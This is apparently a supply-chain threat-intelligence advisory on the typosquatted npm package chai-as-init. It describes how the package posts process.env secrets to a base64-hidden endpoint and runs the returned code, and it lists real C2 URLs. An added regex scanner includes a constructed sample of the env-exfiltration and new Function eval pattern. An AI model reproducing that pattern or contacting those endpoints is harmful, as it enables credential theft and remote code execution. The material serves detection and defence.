THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · typosquatting · osv

Malicious code in chai-as-init (npm)

chai-as-init

Risk score

92

AI summary

Indexed incident for chai-as-init (npm).

Description

chai-as-init is a malicious npm package that, when imported, downloads a C2 dropper from https://api.npoint[.]io/c2e881b8bc0fe2121454 and executes it (similar to the malware in chai-await-test).


-= Per source details. Do not edit below this line.=-

chai-as-init is a typosquat impersonating chai-as-promised, with a README copy-pasted from pino. The exported middleware spawns a detached background process running lib/initializeCaller.js, which posts the full process.env object (including AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI and other secrets) to a base64-obfuscated endpoint that decodes to https://ipcheck-hashed.vercel.app/api/auth/b4dadd6a26d820d085963. The HTTP response body is then passed to new Function("require", response.data) and invoked with the local require, allowing the operator of that endpoint to execute arbitrary Node.js code in the victim process with full module access. The package's claimed logging/chai purpose is unrelated to the code that actually runs.
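
A heuristic static check for the behaviours described above (detached child process, bulk process.env upload, base64-hidden strings, and new Function("require", ...)), given here as an added example that is not part of the advisory or of ThreatPkg. The rule ids, `scanPackage`, the flagging threshold and both sample packages are constructed assumptions.

```javascript
// Added example: regex heuristics for the behaviours this advisory describes.
// Rule ids, the flagging threshold and all sample sources are constructed.
const RULES = [
  // child process started with { detached: true } so it outlives the importer
  { id: 'detached-spawn', re: /\b(?:spawn|fork|exec)\s*\([^;]*detached\s*:\s*true/ },
  // the whole environment object passed or serialized, not a single variable
  { id: 'env-bulk-send',
    re: /JSON\.stringify\s*\(\s*process\.env\s*\)|[:,({]\s*(?:\.\.\.)?process\.env\s*[,})]/ },
  // new Function("require", <data>) builds code with module access
  { id: 'remote-code-eval', re: /new\s+Function\s*\(\s*(['"])require\1\s*,/ },
  // string literals hidden behind base64 decoding
  { id: 'base64-decoded-string', re: /Buffer\.from\s*\([^)]*,\s*(['"])base64\1\s*\)|\batob\s*\(/ },
];

// files: { relativePath: sourceText }. Returns per-file rule hits and a verdict.
function scanPackage(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    for (const { id, re } of RULES) {
      if (re.test(source)) findings.push({ path, rule: id });
    }
  }
  const ids = new Set(findings.map((f) => f.rule));
  // Any one rule alone is common in benign code; flag on the eval rule or a combination.
  return { flagged: ids.has('remote-code-eval') || ids.size >= 2, findings };
}

// Constructed stand-in for the described layout (placeholder endpoint, undefined post()).
const SUSPECT = {
  'index.js':
    "const { spawn } = require('child_process');\n" +
    "spawn(process.execPath, ['lib/initializeCaller.js'], { detached: true }).unref();\n",
  'lib/initializeCaller.js':
    "const url = Buffer.from('<BASE64-PLACEHOLDER>', 'base64').toString();\n" +
    "post(url, { ...process.env }).then((r) => new Function('require', r.data)(require));\n",
};
// Constructed benign code: reads one variable, forwards env to a local child.
const BENIGN = {
  'logger.js': "const level = process.env.LOG_LEVEL || 'info';\n",
  'git.js': "spawn('git', ['status'], { env: process.env });\n",
};

console.log(scanPackage(SUSPECT), scanPackage(BENIGN));
```

Regex matching of this kind misses minified or further-obfuscated code, so a clean result is not evidence that a package is safe.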

Technical details

Affected versions

=1.4.6, >=0

Indicators

  • affected version: =1.4.6 (75%)
  • affected version: >=0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
